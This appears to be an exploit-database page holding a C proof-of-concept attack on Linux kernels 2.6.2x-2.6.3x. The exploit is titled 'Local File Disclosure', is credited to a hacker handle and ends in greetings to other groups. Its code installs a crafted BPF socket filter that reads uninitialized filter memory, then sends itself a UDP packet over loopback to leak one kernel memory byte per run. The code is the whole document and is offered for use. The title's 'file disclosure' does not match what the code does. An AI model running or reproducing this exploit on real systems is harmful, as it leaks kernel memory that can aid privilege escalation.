Local File Disclosure 2.6.2* - 2.6.3*

1. 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
2. 0 _ __ __ __ 1
3. 1 /' \ __ /'__`\ /\ \__ /'__`\ 0
4. 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
5. 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
6. 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
7. 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
8. 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
9. 1 \ \____/ >> Exploit database separated by exploit 0
10. 0 \/___/ type (local, remote, DoS, etc.) 1
11. 1 0
12. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
13.  
14.  
15. /*
16. * Local File Disclosure
17. * Linux Kernel 2.6.2* - 2.6.3*
18. * By > CrosS
19. * Greetz > r0073r , r4dc0re , Side^effects(1337day.com)
20. * Ataman , S4(uR4 , Xenu , kokoko(r00tw0rm.com)
21. /
22.  
23. #include <string.h>
24. #include <stdio.h>
25. #include <netinet/in.h>
26. #include <sys/socket.h>
27. #include <unistd.h>
28. #include <stdlib.h>
29. #include <linux/filter.h>
30.  
31. #define PORT 37337
32.  
33. int transfer(int sendsock, int recvsock)
34. {
35.  
36. struct sockaddr_in addr;
37. char buf[512];
38. int len = sizeof(addr);
39.  
40. memset(buf, 0, sizeof(buf));
41.  
42. if (fork())
43. return recvfrom(recvsock, buf, 512, 0, (struct sockaddr *)&addr, &len);
44.  
45. sleep(1);
46.  
47. memset(&addr, 0, sizeof(addr));
48. addr.sin_family = AF_INET;
49. addr.sin_port = htons(PORT);
50. addr.sin_addr.s_addr = inet_addr("127.0.0.1");
51.  
52. sendto(sendsock, buf, 512, 0, (struct sockaddr *)&addr, len);
53.  
54. exit(0);
55.  
56. }
57.  
58. int main(int argc, char * argv[])
59. {
60.  
61. int sendsock, recvsock, ret;
62. unsigned int val;
63. struct sockaddr_in addr;
64. struct sock_fprog fprog;
65. struct sock_filter filters[5];
66.  
67. if (argc != 2) {
68. printf("[*] Usage: %s offset (0-63)\n", argv[0]);
69. return -1;
70. }
71.  
72. val = atoi(argv[1]);
73.  
74. if (val > 63) {
75. printf("[*] Inv4liD by7e oFfs3t (must be 0-63)\n");
76. return -1;
77. }
78.  
79. recvsock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
80. sendsock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
81.  
82. if (recvsock < 0 || sendsock < 0) {
83. printf("[*] CoulD no7 Cre4t3 soCke7s.\n");
84. return -1;
85. }
86.  
87. memset(&addr, 0, sizeof(addr));
88. addr.sin_family = AF_INET;
89. addr.sin_port = htons(PORT);
90. addr.sin_addr.s_addr = htonl(INADDR_ANY);
91.  
92. if (bind(recvsock, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
93. printf("[*] CoulD no7 biNd soCke7.\n");
94. return -1;
95. }
96.  
97. memset(&fprog, 0, sizeof(fprog));
98. memset(filters, 0, sizeof(filters));
99.  
100. filters[0].code = BPF_LD|BPF_MEM;
101. filters[0].k = (val & ~0x3) / 4;
102.  
103. filters[1].code = BPF_ALU|BPF_AND|BPF_K;
104. filters[1].k = 0xff << ((val % 4) * 8);
105.  
106. filters[2].code = BPF_ALU|BPF_RSH|BPF_K;
107. filters[2].k = (val % 4) * 8;
108.  
109. filters[3].code = BPF_ALU|BPF_ADD|BPF_K;
110. filters[3].k = 256;
111.  
112. filters[4].code = BPF_RET|BPF_A;
113.  
114. fprog.len = 5;
115. fprog.filter = filters;
116.  
117. if (setsockopt(recvsock, SOL_SOCKET, SO_ATTACH_FILTER, &fprog, sizeof(fprog)) < 0) {
118. printf("[*] F41leD 7o 1nstaLl fiLteR y0u m0f0 h3aD.\n");
119. return -1;
120. }
121.  
122. ret = transfer(sendsock, recvsock);
123.  
124. printf("[*] Your byte: 0x%.02x\n", ret - 248);
125.  
126. }